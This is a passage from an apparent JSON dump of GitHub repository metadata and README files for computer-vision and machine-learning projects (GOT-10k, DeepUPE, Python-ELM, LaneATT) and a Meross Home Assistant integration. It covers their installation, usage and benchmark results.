database for training and evaluating general-purpose visual trackers. If you use the GOT-10k database or toolkits for a research publication, please consider citing:\n\n```Bibtex\n@ARTICLE{8922619,\n author={Huang, Lianghua and Zhao, Xin and Huang, Kaiqi},\n journal={IEEE Transactions on Pattern Analysis and Machine Intelligence}, \n title={GOT-10k: A Large High-Diversity Benchmark for Generic Object Tracking in the Wild}, \n year={2021},\n volume={43},\n number={5},\n pages={1562-1577},\n doi={10.1109/TPAMI.2019.2957464}}\n```\n\n \\[[Project](http://got-10k.aitestunion.com/)\\]\\[[PDF](https://arxiv.org/abs/1810.11981)\\]\\[[Bibtex](http://got-10k.aitestunion.com/bibtex)\\]\n\n## Table of Contents\n\n* [Installation](#installation)\n* [Quick Start: A Concise Example](#quick-start-a-concise-example)\n* [Quick Start: Jupyter Notebook for Off-the-Shelf Usage](#quick-start-jupyter-notebook-for-off-the-shelf-usage)\n* [How to Define a Tracker?](#how-to-define-a-tracker)\n* [How to Run Experiments on GOT-10k?](#how-to-run-experiments-on-got-10k)\n* [How to Evaluate Performance?](#how-to-evaluate-performance)\n* [How to Plot Success Curves?](#how-to-plot-success-curves)\n* [How to Loop Over GOT-10k Dataset?](#how-to-loop-over-got-10k-dataset)\n* [Issues](#issues)\n* [Contributors](#contributors)\n\n### Installation\n\nInstall the toolkit using `pip` (recommended):\n\n```bash\npip install --upgrade got10k\n```\n\nStay up-to-date:\n\n```bash\npip install --upgrade git+https://github.com/got-10k/toolkit.git@master\n```\n\nOr, alternatively, clone the repository and install dependencies:\n\n```\ngit clone https://github.com/got-10k/toolkit.git\ncd toolkit\npip install -r requirements.txt\n```\n\nThen directly copy the `got10k` folder to your workspace to use it.\n\n### Quick Start: A Concise Example\n\nHere is a simple example of how to use the toolkit to define a tracker, run experiments on GOT-10k and evaluate performance.\n\n```Python\nfrom got10k.trackers import Tracker\nfrom got10k.experiments import ExperimentGOT10k\n\nclass IdentityTracker(Tracker):\n def __init__(self):\n 
super(IdentityTracker, self).__init__(name='IdentityTracker')\n \n def init(self, image, box):\n self.box = box\n\n def update(self, image):\n return self.box\n\nif __name__ == '__main__':\n # setup tracker\n tracker = IdentityTracker()\n\n # run experiments on GOT-10k (validation subset)\n experiment = ExperimentGOT10k('data/GOT-10k', subset='val')\n experiment.run(tracker, visualize=True)\n\n # report performance\n experiment.report([tracker.name])\n```\n\nTo run experiments on [OTB](http://cvlab.hanyang.ac.kr/tracker_benchmark/index.html), [VOT](http://votchallenge.net) or other benchmarks, simply change `ExperimentGOT10k`, e.g., to `ExperimentOTB` or `ExperimentVOT`, and `root_dir` to their corresponding paths for this purpose.\n\n### Quick Start: Jupyter Notebook for Off-the-Shelf Usage\n\nOpen [quick_examples.ipynb](https://github.com/got-10k/toolkit/tree/master/examples/quick_examples.ipynb) in [Jupyter Notebook](http://jupyter.org/) to see more examples on toolkit usage.\n\n### How to Define a Tracker?\n\nTo define a tracker using the toolkit, simply inherit and override `init` and `update` methods from the `Tracker` class. Here is a simple example:\n\n```Python\nfrom got10k.trackers import Tracker\n\nclass IdentityTracker(Tracker):\n def __init__(self):\n super(IdentityTracker, self).__init__(\n name='IdentityTracker', # tracker name\n is_deterministic=True # stochastic (False) or deterministic (True)\n )\n \n def init(self, image, box):\n self.box = box\n\n def update(self, image):\n return self.box\n```\n\n### How to Run Experiments on GOT-10k?\n\nInstantiate an `ExperimentGOT10k` object, and leave all experiment pipelines to its `run` method:\n\n```Python\nfrom got10k.experiments import ExperimentGOT10k\n\n# ... tracker definition ...\n\n# instantiate a tracker\ntracker = IdentityTracker()\n\n# setup experiment (validation subset)\nexperiment = ExperimentGOT10k(\n root_dir='data/GOT-10k', # GOT-10k's root directory\n subset='val', # 'train' | 'val' | 'test'\n result_dir='results', # where to store tracking results\n report_dir='reports' # where to store evaluation reports\n)\nexperiment.run(tracker, visualize=True)\n```\n\nThe tracking results will be stored in `result_dir`.\n\n### How to Evaluate Performance?\n\nUse the `report` method of `ExperimentGOT10k` for this purpose:\n\n```Python\n# ... run experiments on GOT-10k ...\n\n# report tracking performance\nexperiment.report([tracker.name])\n```\n\nWhen evaluated on the __validation subset__, the scores and curves will be directly generated in `report_dir`.\n\nHowever, when evaluated on the __test subset__, since all groundtruths are withholded, you will have to submit your results to the [evaluation server](http://got-10k.aitestunion.com/submit_instructions) for evaluation. The `report` function will generate a `.zip` file which can be directly uploaded for submission. 
For more instructions, see [submission instruction](http://got-10k.aitestunion.com/submit_instructions).\n\nSee public evaluation results on [GOT-10k's leaderboard](http://got-10k.aitestunion.com/leaderboard).\n\n## How to Plot Success Curves?\n\nAssume that a list of all performance files (JSON files) are stored in `report_files`, here is an example showing how to plot success curves:\n\n```Python\nfrom got10k.experiments import ExperimentGOT10k\n\nreport_files = ['reports/GOT-10k/performance_25_entries.json']\ntracker_names = ['SiamFCv2', 'GOTURN', 'CCOT', 'MDNet']\n\n# setup experiment and plot curves\nexperiment = ExperimentGOT10k('data/GOT-10k', subset='test')\nexperiment.plot_curves(report_files, tracker_names)\n```\n\nThe report file of 25 baseline entries can be downloaded from the [Downloads page](http://got-10k.aitestunion.com/downloads). You can also download single report file for each entry from the [Leaderboard page](http://got-10k.aitestunion.com/leaderboard).\n\n### How to Loop Over GOT-10k Dataset?\n\nThe `got10k.datasets.GOT10k` provides an iterable and indexable interface for GOT-10k's sequences. Here is an example:\n\n```Python\nfrom PIL import Image\nfrom got10k.datasets import GOT10k\nfrom got10k.utils.viz import show_frame\n\ndataset = GOT10k(root_dir='data/GOT-10k', subset='train')\n\n# indexing\nimg_file, anno = dataset[10]\n\n# for-loop\nfor s, (img_files, anno) in enumerate(dataset):\n seq_name = dataset.seq_names[s]\n print('Sequence:', seq_name)\n\n # show all frames\n for f, img_file in enumerate(img_files):\n image = Image.open(img_file)\n show_frame(image, anno[f, :])\n```\n\nTo loop over `OTB` or `VOT` datasets, simply change `GOT10k` to `OTB` or `VOT` for this purpose.\n\n### Issues\n\nPlease report any problems or suggessions in the [Issues](https://github.com/got-10k/toolkit/issues) page.\n\n### Contributors\n\n- [Lianghua Huang](https://github.com/huanglianghua)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dvlab-research/DeepUPE", "link": "https://github.com/dvlab-research/DeepUPE", "tags": [], "stars": 514, "description": "Underexposed Photo Enhancement Using Deep Illumination Estimation", "lang": "Python", "repo_lang": "", "readme": "# Underexposed Photo Enhancement Using Deep Illumination Estimation\n\n[Ruixing Wang](http://appsrv.cse.cuhk.edu.hk/~rxwang/)1, [Qing Zhang](http://zhangqing-home.net)2, [Chi-Wing Fu](https://www.cse.cuhk.edu.hk/~cwfu/)1, [Xiaoyong Shen](http://xiaoyongshen.me/)3, [Wei-Shi Zheng](https://sites.google.com/site/sunnyweishi/)2, [Jiaya Jia](http://jiaya.me/)1,3\n\n1The chinese university of hong kong 2Sun Yat-sen University 3Tencent Youtu Lab\n\n### [Paper](https://drive.google.com/file/d/1CCd0NVEy0yM2ulcrx44B1bRPDmyrgNYH/view?usp=sharing), [Errata](https://drive.google.com/file/d/1fJ7MQfm6NuCMtfQzLM0Y6LNU9XyQb6Ho/view?usp=sharing)\n### Usage\n\n1. Clone the repository:\n\n ```shell\n git clone https://github.com/wangruixing/DeepUPE.git\n ```\n2. Install the Python dependencies, run:\n ```shell\n cd main\n pip install -r requirements.txt\n make\n ```\n3. Evaluation:\nThe test set can be downloaded in https://drive.google.com/open?id=1FrlMdnwiUfHthtw0jHdp40IbOVXfsoZJ. It includes 500 pair images from MIT-Adobe FiveK 4500-5000. You can download this and run:\n```shell\n python main/run.py checkpoints \n``` \nPSNR evaluation code is in avg_psnr.m. 
Modify the related paths in 'avg_psnr.m', and run it.\n\n### Errata\nWe recently found an implementation bug in calculating PSNR. Fortunately, this bug doesn't affect any of the conclusions in our paper, we have corrected this bug in the Matlab code and updated the corresponding values in the revised paper. We apologize for the confusion to readers.\n\n\n# Bibtex\n```\n@InProceedings{Wang_2019_CVPR,\nauthor = {Wang, Ruixing and Zhang, Qing and Fu, Chi-Wing and Shen, Xiaoyong and Zheng, Wei-Shi and Jia, Jiaya},\ntitle = {Underexposed Photo Enhancement Using Deep Illumination Estimation},\nbooktitle = {The IEEE Conference on Computer Vision and Pattern Recognition (CVPR)},\nmonth = {June},\nyear = {2019}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dclambert/Python-ELM", "link": "https://github.com/dclambert/Python-ELM", "tags": [], "stars": 514, "description": "Extreme Learning Machine implementation in Python", "lang": "Python", "repo_lang": "", "readme": "Python-ELM v0.3\n===============\n\n__---> ARCHIVED March 2021 <---__\n\n###### This is an implementation of the [Extreme Learning Machine](http://www.extreme-learning-machines.org) [1][2] in Python, based on [scikit-learn](http://scikit-learn.org).\n\n###### From the abstract:\n\n> It is clear that the learning speed of feedforward neural networks is in general far slower than required and it has been a major bottleneck in their applications for past decades. Two key reasons behind may be: 1) the slow gradient- based learning algorithms are extensively used to train neural networks, and 2) all the parameters of the networks are tuned iteratively by using such learning algorithms. Unlike these traditional implementations, this paper proposes a new learning algorithm called extreme learning machine (ELM) for single- hidden layer feedforward neural networks (SLFNs) which ran- domly chooses the input weights and analytically determines the output weights of SLFNs. In theory, this algorithm tends to provide the best generalization performance at extremely fast learning speed. The experimental results based on real- world benchmarking function approximation and classification problems including large complex applications show that the new algorithm can produce best generalization performance in some cases and can learn much faster than traditional popular learning algorithms for feedforward neural networks.\n\nIt's a work in progress, so things can/might/will change.\n\n__David C. 
Lambert__ \n__dcl [at] panix [dot] com__ \n\n__Copyright \u00a9 2013__ \n__License: Simple BSD__\n\nFiles\n-----\n#### __random_layer.py__\n\nContains the __RandomLayer__, __MLPRandomLayer__, __RBFRandomLayer__ and __GRBFRandomLayer__ classes.\n\nRandomLayer is a transformer that creates a feature mapping of the\ninputs that corresponds to a layer of hidden units with randomly \ngenerated components.\n\nThe transformed values are a specified function of input activations\nthat are a weighted combination of dot product (multilayer perceptron)\nand distance (rbf) activations:\n\n\t input_activation = alpha * mlp_activation + (1-alpha) * rbf_activation\n\n\t mlp_activation(x) = dot(x, weights) + bias\n\t rbf_activation(x) = rbf_width * ||x - center||/radius\n\n_mlp_activation_ is multi-layer perceptron input activation \n\n_rbf_activation_ is radial basis function input activation\n\n_alpha_ and _rbf_width_ are specified by the user\n\n_weights_ and _biases_ are taken from normal distribution of\nmean 0 and sd of 1\n\n_centers_ are taken uniformly from the bounding hyperrectangle\nof the inputs, and\n\n\tradius = max(||x-c||)/sqrt(n_centers*2)\n\n(All random components can be supplied by the user by providing entries in the dictionary given as the _user_components_ parameter.)\n\nThe input activation is transformed by a transfer function that defaults\nto numpy.tanh if not specified, but can be any callable that returns an\narray of the same shape as its argument (the input activation array, of\nshape [n_samples, n_hidden]).\n\nTransfer functions provided are:\n\n*\tsine\n*\ttanh\n*\ttribas\n*\tinv_tribas\n*\tsigmoid\n*\thardlim\n*\tsoftlim\n*\tgaussian\n*\tmultiquadric\n*\tinv_multiquadric\n\nMLPRandomLayer and RBFRandomLayer classes are just wrappers around the RandomLayer class, with the _alpha_ mixing parameter set to 1.0 and 0.0 respectively (for 100% MLP input activation, or 100% RBF input activation)\n\t\nThe RandomLayer, MLPRandomLayer, RBFRandomLayer classes can take a callable user\nprovided transfer function. See the docstrings and the example ipython\nnotebook for details.\n\nThe GRBFRandomLayer implements the Generalized Radial Basis Function from [[3]](http://sci2s.ugr.es/keel/pdf/keel/articulo/2011-Neurocomputing1.pdf)\n\n#### __elm.py__\n\nContains the __ELMRegressor__, __ELMClassifier__, __GenELMRegressor__, and __GenELMClassifier__ classes.\n\nGenELMRegressor and GenELMClassifier both take *RandomLayer instances as part of their contructors, and an optional regressor (conforming to the sklearn API)for performing the fit (instead of the default linear fit using the pseudo inverse from scipy.pinv2).\nGenELMClassifier is little more than a wrapper around GenELMRegressor that binarizes the target array before performing a regression, then unbinarizes the prediction of the regressor to make its own predictions.\n\nThe ELMRegressor class is a wrapper around GenELMRegressor that uses a RandomLayer instance by default and exposes the RandomLayer parameters in the constructor. 
ELMClassifier is similar for classification.\n\n#### __plot_elm_comparison.py__\n\nA small demo (based on scikit-learn's plot_classifier_comparison) that shows the decision functions of a couple of different instantiations of the GenELMClassifier on three different datasets.\n\n#### __elm_notebook.py__\n\nAn IPython notebook, illustrating several ways to use the __\\*ELM\\*__ and __\\*RandomLayer__ classes.\n\nRequirements\n------------\n\nWritten using Python 2.7.3, numpy 1.6.1, scipy 0.10.1, scikit-learn 0.13.1 and ipython 0.12.1\n\nReferences\n----------\n```\n[1] http://www.extreme-learning-machines.org\n\n[2] G.-B. Huang, Q.-Y. Zhu and C.-K. Siew, \"Extreme Learning Machine:\n Theory and Applications\", Neurocomputing, vol. 70, pp. 489-501,\n 2006.\n \n[3] Fernandez-Navarro, et al, \"MELM-GRBF: a modified version of the \n extreme learning machine for generalized radial basis function \n neural networks\", Neurocomputing 74 (2011), 2502-2510\n```\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "albertogeniola/meross-homeassistant", "link": "https://github.com/albertogeniola/meross-homeassistant", "tags": ["meross", "homeassistant", "meross-homeassistant"], "stars": 514, "description": "Custom component that leverages the Meross IoT library to integrate with Homeassistant", "lang": "Python", "repo_lang": "", "readme": "[![hacs_badge](https://img.shields.io/badge/HACS-Default-orange.svg?style=for-the-badge)](https://github.com/hacs/integration)\n![Build](https://img.shields.io/azure-devops/build/albertogeniola/c4128d1b-c23c-418d-95c5-2de061954ee5/3/master?style=for-the-badge)\n\n## \ud83d\udca3\ud83d\udca3 BREAKING CHANGES FROM MEROSS API \ud83d\udca3\ud83d\udca3\nIn the past 24 hours, Meross has changed the signature of its HTTP API version (keeping the same API version in place). \n**That did break every HomeAssistant integration version below 1.2.6 (included).**\nIn order to solve the issue, you should upgrade to version **1.2.8** which includes the necessary changes to work again with the updated version of the Meross APIs.\n\n# Meross HomeAssistant component\nA full-featured Homeassistant component to drive Meross devices. \nThis component is based on the underlying MerossIot library available [here](https://github.com/albertogeniola/MerossIot).\n\n## Installation & configuration\nYou can install this component in two ways: via HACS or manually.\nHACS is a nice community-maintained components manager, which allows you to install git-hub hosted components in a few clicks.\nIf you have already HACS installed on your HomeAssistant, it's better to go with that.\nOn the other hand, if you don't have HACS installed or if you don't plan to install it, then you can use manual installation.\n\n### Option A: Installing via HACS\nIf you have HACS, well, it's piece of cake! \nJust search for \"Meross\" (Full name is Meross Cloud IoT) in the default repository of HACS and it'll show up.\nClick on Install. When the installation completes, **you must restart homeassistant** in order to make it work.\nAs soon as HomeAssistant is restarted, you can proceed with __component setup__.\n\n### Option B: Classic installation (custom_component)\n1. Download the latest zip release archive from [here](https://github.com/albertogeniola/meross-homeassistant/releases/latest)\n1. 
Unzip/copy the meross_cloud directory within the `custom_components` directory of your homeassistant installation.\nThe `custom_components` directory resides within your homeassistant configuration directory.\nUsually, the configuration directory is within your home (`~/.homeassistant/`).\nIn other words, the configuration directory of homeassistant is where the config.yaml file is located.\nAfter a correct installation, your configuration directory should look like the following.\n ```\n \u2514\u2500\u2500 ...\n \u2514\u2500\u2500 configuration.yaml\n \u2514\u2500\u2500 secrects.yaml\n \u2514\u2500\u2500 custom_components\n \u2514\u2500\u2500 meross_cloud\n \u2514\u2500\u2500 __init__.py\n \u2514\u2500\u2500 common.py\n \u2514\u2500\u2500 cover.py\n \u2514\u2500\u2500 ...\n ```\n\n **Note**: if the custom_components directory does not exist, you need to create it.\n\nAfter copy-pasting the meross_cloud directory into the custom_components folder, you need to restart HomeAssistant.\nAs soon as HomeAssistant is restarted, you can proceed with __component setup__.\n\n### Component setup \nOnce the component has been installed, you need to configure it in order to make it work.\nTo do so, navigate to \"Configuration -> Integrations -> Add Integration\" and look for \"Meross Cloud IoT\".\nAs soon as you add it, you'll be asked to configure it. \nThe following table summarizes the fields that the wizard will require you to fill in:\n\n| Field Name | Example Value | Description | \n|----------------------------------|-------------------------|---------------------------------------------------------|\n| HTTP Api Endpoint | https://iot.meross.com | Is the HTTP(s) API endpoint used by the Meross Manager. This might vary in accordance with your country | \n| Email Address | johndoe@gmail.com | Your Meross account username/email. If connecting to the official Meross cloud, use the same from the Meross App |\n| Password | R4nd0mS3cret | Your Meross account password. If connecting to the official Meross cloud, use the same from the Meross App |\n| Skip MQTT certificate validation | True (Checked) | Configures MQTT certificate validation. When unchecked it requires a valid certificate to be exposed from the Meross Server. If checked, it skips the MQTT certificate validation. If connecting to the official Meross cloud, you can uncheck this. When connecting to local-lan or custom MQTT brokers, you might want to check this. |\n\nThe following animation shows an example of component configuration\n[![Installation via web UI](https://raw.githubusercontent.com/albertogeniola/meross-homeassistant/master/docs/source/images/components/meross_cloud/install-via-webui.gif)](https://raw.githubusercontent.com/albertogeniola/meross-homeassistant/master/docs/source/images/components/meross_cloud/install-via-webui.gif)\n\n## Features\n### Massive support\nThis library supports all the Meross devices currently exposed by the Meross IoT library.\nIn particular Bulbs, Switches, Garage Door Openers and Smart Valves/Thermostat are fully supported and perfectly integrated with HomeAssistant.\n\n
\n Have a look at the screenshots below... (user interface, device control and power readings)\n
\n \n## :new: :rocket: A first version of the Local-Only Addon is HERE! :rocket:\nIt took a bit, but eventually it's here. A very first **unstable** version of the Local Meross Addon has been developed.\nThe latest version of this component, v1.2.5rc1, does support it and has been tested successfully with both MSS210 and MSS310 devices.\nPlease note that using the Local Addon is only advised for advanced users who are experiencing problems with the Meross security\nteam complaining about high-rate API calls to their systems. If you plan to use such devices off-grid, the Local Addon is what you are\nlooking for. Again, be advised: it's still a work in progress and your devices might not work as expected (for now).\n\nYou can find installation instructions for the Local Addon directly [here](https://github.com/albertogeniola/ha-meross-local-broker).\n\n### What is the local-addon?\nThe Meross Plugin has gained great success and popularity among HomeAssistant users. However, the Meross engineers are imposing\nnew limits on their MQTT broker system, which causes problems for HA users who want to implement aggressive polling or have\nmore than 10 devices connected to HA. For this reason, I am working on a new HomeAssistant addon, namely the \"Meross Local Addon\", \nwhich aims at re-implementing the Meross MQTT broker and HTTP API layer locally within the addon. This basically allows users\nto rely only on a LAN-local connection, using HomeAssistant as the command center. \n\n### How to use this Meross Component with the Local Addon?\nIn order to take advantage of the Local Meross Addon, you need to follow the instructions below:\n1. Install or update the Meross Custom Component via HACS (or manually, if you prefer) to at least version 1.2.5rc1, \nwhich is the first one supporting the Meross Local Addon.\n1. Add the Meross Local Addon repository to your HomeAssistant installation. You can do that following the [instructions here](https://github.com/albertogeniola/ha-meross-local-broker) or simply press the following button\n\n [![Open your Home Assistant instance and show the add add-on repository dialog with a specific repository URL pre-filled.](https://my.home-assistant.io/badges/supervisor_add_addon_repository.svg)](https://my.home-assistant.io/redirect/supervisor_add_addon_repository/?repository_url=https%3A%2F%2Fgithub.com%2Falbertogeniola%2Fha-meross-local-broker)\n1. Make sure the \"Meross Local Addon for Homeassistant\" appears in the \"community addons\" section and, if so, install it. At the time of writing the latest\navailable version is *0.0.1-alpha42*. Depending on the HA hosting system and on the internet connection speed, it can take up to 20 minutes for the installation to complete.\n\n \n \n1. Navigate to the configuration section of the \"Meross Local Addon\" and make sure the option reinit_db is OFF, while the option \"advertise\" is ON. Leave debug_mode OFF, unless you need to provide supplementary logging information to debug issues. Make sure you don't have any firewall blocking the network traffic to the ports indicated in this section, as the addon will receive traffic from both the Meross devices and the pairer app on such ports.\n \n \n1. Navigate to the \"info\" panel of the addon and make sure the \"Start at boot\" option is ON. Also, make sure the \"Show in menu\" option is set to ON. Then, start the ADDON and wait at least 5 minutes. 
Depending on the device you are running on, the first boot may take up to 10 minutes to complete.\n\n \n1. Open \"Meross Local Addon\" web-interface (you can either click on \"Open Web UI\" or click on the left menu icon . Then, from the web-ui, click on \"Wizard Setup\" or on \"Setup\" and follow the instructions to configure your addon. For now, it's advised not to use the \"Official Meross Link\", as it is still under development.\n\n \n \n\n1. The wizard will guide you through the Account Setup, Meross App installation and pairing process. Make sure you are able to pair at least one device.\n Note about Step 1, credentials setup: choose the username/password you will be using locally to pair your devices. If you don't plan to \"link\" the local addon to the official meross broker, you can choose whatever credentials you like. For instance, you can set: \n username: `meross@local`\n password: `changeme`\n1. When you have paired all the devices you want to manage locally, you can proceed with the setup of the Meross Component. \nNavigate to the HA integration list, and proceed with the installation of the Meross Addon. During the setup phase, make sure to select local addon setup option, not the one relying on the official Meross Broker.\n \n**NOTE**: sometimes, for yet-unknown reasons, MSS310 fails to pair with the local addon broker. However, resetting and retrying the pairing procedure a second time usually works. More recent devices, as the mss210, seem not to suffer of the same problem.\n\nAs you can imagine, there is a huge work behind that: first I need to reverse-engineer the Meross protocols, then I need to \nimplement any \"logic-layer\" implemented on Meross Systems on the new addon I am developing and, eventually, I have to make\nsure that everything works together. That means that I am not able to spend much time in solving issues that may arise in \nthe meantime, and for that I apologize. If you like this project and you want to support me, please consider donating:\nthat motivates me and helps me buy _more ram_ which is absolutely necessary when developing on a virtualized environment.\n\n## Supporting my work\nBy buying me a coffee, not only you make my development more efficient, but also motivate me to further improve \nmy work. On the other hand, buying me a beer will certainly make me happier: **a toast to you, supporter**!\nIn case you are a pro and a strong opensource supporter, you might also consider [sponsoring my GitHub work](https://github.com/sponsors/albertogeniola).\n\n[![Buy me a coffe!](https://www.buymeacoffee.com/assets/img/custom_images/black_img.png)](https://www.buymeacoffee.com/albertogeniola)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "LouisScorpio/datamining", "link": "https://github.com/LouisScorpio/datamining", "tags": [], "stars": 514, "description": "learn in datamining", "lang": "Python", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lucastabelini/LaneATT", "link": "https://github.com/lucastabelini/LaneATT", "tags": ["lane-detection", "deep-learning", "computer-vision", "pytorch"], "stars": 514, "description": "Code for the paper entitled \"Keep your Eyes on the Lane: Real-time Attention-guided Lane Detection\" (CVPR 2021)", "lang": "Python", "repo_lang": "", "readme": "
\n\n# LaneATT\n[![arXiv](https://img.shields.io/badge/arXiv-2010.12035-b31b1b.svg)](https://arxiv.org/abs/2010.12035)\n[![CVPR](https://img.shields.io/badge/CVPR-PDF-blue)](https://openaccess.thecvf.com/content/CVPR2021/html/Tabelini_Keep_Your_Eyes_on_the_Lane_Real-Time_Attention-Guided_Lane_Detection_CVPR_2021_paper.html)\n![Method overview](data/figures/method-overview.png \"Method overview\")\n
\n\nThis repository holds the source code for LaneATT, a novel state-of-the-art lane detection model proposed in the [paper](https://arxiv.org/abs/2010.12035) \"_Keep your Eyes on the Lane: Real-time Attention-guided Lane Detection_\", by [Lucas Tabelini](https://github.com/lucastabelini), [Rodrigo Berriel](http://rodrigoberriel.com), [Thiago M. Paix\u00e3o](https://sites.google.com/view/thiagopx), [Claudine Badue](http://www.inf.ufes.br/~claudine/), [Alberto F. De Souza](http://www.lcad.inf.ufes.br/team/index.php/Prof._Dr._Alberto_Ferreira_De_Souza), and [Thiago Oliveira-Santos](http://www.inf.ufes.br/~todsantos/home).\n\n**News (2021-03-01)**: Our paper presenting LaneATT has been accepted to CVPR'21.\n\n### Table of contents\n1. [Prerequisites](#1-prerequisites)\n2. [Install](#2-install)\n3. [Getting started](#3-getting-started)\n4. [Results](#4-results)\n5. [Code structure](#5-code-structure)\n6. [Citation](#6-Citation)\n\n\n### 1. Prerequisites\n- Python >= 3.5\n- PyTorch == 1.6, tested on CUDA 10.2. The models were trained and evaluated on PyTorch 1.6. When testing with other versions, the results (metrics) are slightly different.\n- CUDA, to compile the NMS code\n- Other dependencies described in `requirements.txt`\n\nThe versions described here were the lowest the code was tested with. Therefore, it may also work in other earlier versions, but it is not guaranteed (e.g., the code might run, but with different outputs).\n\n### 2. Install\nConda is not necessary for the installation, as you can see, I only use it for PyTorch and Torchvision.\nNevertheless, the installation process here is described using it.\n\n```bash\nconda create -n laneatt python=3.8 -y\nconda activate laneatt\nconda install pytorch==1.6 torchvision -c pytorch\npip install -r requirements.txt\ncd lib/nms; python setup.py install; cd -\n```\n\n### 3. Getting started\n#### Datasets\nFor a guide on how to download and setup each dataset, see [DATASETS.md](DATASETS.md).\n\n#### Training & testing\nTrain a model:\n```\npython main.py train --exp_name example --cfg example.yml\n```\nFor example, to train LaneATT with the ResNet-34 backbone on TuSimple, run:\n```\npython main.py train --exp_name laneatt_r34_tusimple --cfg cfgs/laneatt_tusimple_resnet34.yml\n```\nAfter running this command, a directory `experiments` should be created (if it does not already exists). Another\ndirectory `laneatt_r34_tusimple` will be inside it, containing data related to that experiment (e.g., model checkpoints, logs, evaluation results, etc)\n\nEvaluate a model:\n```\npython main.py test --exp_name example\n```\nThis command will evaluate the model saved in the last checkpoint of the experiment `example` (inside `experiments`).\nIf you want to evaluate another checkpoint, the `--epoch` flag can be used. For other flags, please see `python main.py -h`. To **visualize the predictions**, run the above command with the additional flag `--view all`.\n\n#### Reproducing a result from the paper\n0. Set up the dataset you want to reproduce the results on (as described in [DATASETS.md](DATASETS.md)).\n1. Download the zip containing all pretrained models and then unzip it at the code's root:\n```bash\ngdown \"https://drive.google.com/uc?id=1R638ou1AMncTCRvrkQY6I-11CPwZy23T\" # main experiments on TuSimple, CULane and LLAMAS (1.3 GB)\nunzip laneatt_experiments.zip\n```\n2. 
Run the evaluation (inference + metric computation):\n```bash\npython main.py test --exp_name $EXP_NAME\n```\nReplace `$EXP_NAME` with the name of a directory inside `experiments/`. For instance, if you want to reproduce the results using the ResNet-34 backbone on the TuSimple dataset, run:\n```bash\npython main.py test --exp_name laneatt_r34_tusimple\n```\nThe results on TuSimple and LLAMAS should match exactly the ones reported in the paper. The results on CULane will deviate in the order of 0.1% (as shown in the CULane table below), since the metric reported on the paper was computed with the official code (C++), while this script will compute it using our implementation (which is much faster and in Python). The official metric implementation is available [here](https://github.com/XingangPan/SCNN/tree/master/tools/lane_evaluation).\n\n### 4. Results\n![F1 vs. Latency for state-of-the-art methods on lane detection](data/figures/f1-vs-latency.png \"F1 vs. Latency for state-of-the-art methods on lane detection\")\n\n#### CULane\n\n| Backbone | F1, official impl. (%) | F1, our impl. (%) | FPS |\n| :--- | ---: | ---: | ---:|\n| ResNet-18 | 75.13 | 75.08 | 250 |\n| ResNet-34 | 76.68 | 76.66 | 171 |\n| ResNet-122 | 77.02 | 77.02 | 26 |\n\n\"F1, official impl.\" refers to the official CULane metric implementation in C++. \"F1, our impl\" refers to our implementation of the metric in Python. The results reported in the paper were computed using the [official metric implementation](https://github.com/XingangPan/SCNN/tree/master/tools/lane_evaluation)\n (requires OpenCV 2.4).\n [![CULane video](data/figures/culane_video.png \"CULane video\")](https://youtu.be/ghs93acwkBQ)\n\n#### TuSimple\n| Backbone | Accuracy (%) | FDR (%) | FNR (%) | F1 (%) | FPS |\n| :--- | ---: | ---: | ---: | ---: | ---:|\n| ResNet-18 | 95.57 | 3.56 | 3.01 | 96.71 | 250 |\n| ResNet-34 | 95.63 | 3.53 | 2.92 | 96.77 | 171 |\n| ResNet-122 | 96.10 | 4.64 | 2.17 | 96.06 | 26 |\n\nSince the TuSimple dataset is not sequential, no qualitative video is available.\n\n#### LLAMAS\n| Backbone | F1 (%) | Precision (%) | Recall (%) | FPS |\n| :--- | ---: | ---: | ---: | ---:|\n| ResNet-18 | 93.46 | 96.92 | 90.24 | 250 |\n| ResNet-34 | 93.74 | 96.79 | 90.88 | 171 |\n| ResNet-122 | 93.54 | 96.82 | 90.47 | 26 |\n\n [![LLAMAS video](data/figures/llamas_video.png \"LLAMAS video\")](https://youtu.be/1f_y4A-muMg)\n\nAdditional results can be seen in the paper.\n\n### 5. 
Code structure\n- **cfgs:** Default configuration files\n- **figures:** Images used in this repository\n- **lib**\n - **datasets**\n - **culane.py:** CULane annotation loader\n - **lane_dataset.py:** Transforms raw annotations from a `LaneDatasetLoader` into a format usable by the model\n - **lane_dataset_loader.py:** Abstract class that each dataset loader implements\n - **llamas.py:** LLAMAS annotation loader\n - **nolabel_dataset.py:** Used on data with no annotation available (or quick qualitative testing)\n - **tusimple.py:** TuSimple annotation loader\n - **models:**\n - **laneatt.py:** LaneATT implementation\n - **matching.py:** Utility function for ground-truth and proposal matching\n - **resnet.py:** Implementation of ResNet\n - **nms:** NMS implementation\n - **config.py:** Configuration loader\n - **experiment.py:** Tracks and stores information about each experiment\n - **focal_loss.py:** Implementation of Focal Loss\n - **lane.py:** Lane representation\n - **runner.py:** Training and testing loops\n- **utils**:\n - **culane_metric.py:** Unofficial implementation of the CULane metric. This implementation is faster than the official one;\n however, it does not exactly match the results of the official one (error on the order of 1e-4). Thus, it was used only during the model's development.\n For the results reported in the paper, the official one was used.\n - **gen_anchor_mask.py**: Computes the frequency of each anchor in a dataset to be used in the anchor filtering step\n - **gen_video.py:** Generates a video from a model's predictions\n - **llamas_metric.py**: Official implementation of the LLAMAS metric\n - **llamas_utils.py**: Utility functions for the LLAMAS dataset\n - **speed.py:** Measures efficiency-related metrics of a model\n - **tusimple_metric.py**: Official implementation of the TuSimple metric\n - **viz_dataset.py**: Shows images sampled from a dataset (post-augmentation)\n- **main.py:** Runs the training or testing phase of an experiment\n\n### 6. Citation\nIf you use this code in your research, please cite:\n\n```bibtex\n@InProceedings{tabelini2021cvpr,\n author = {Lucas Tabelini\n and Rodrigo Berriel\n and Thiago M. 
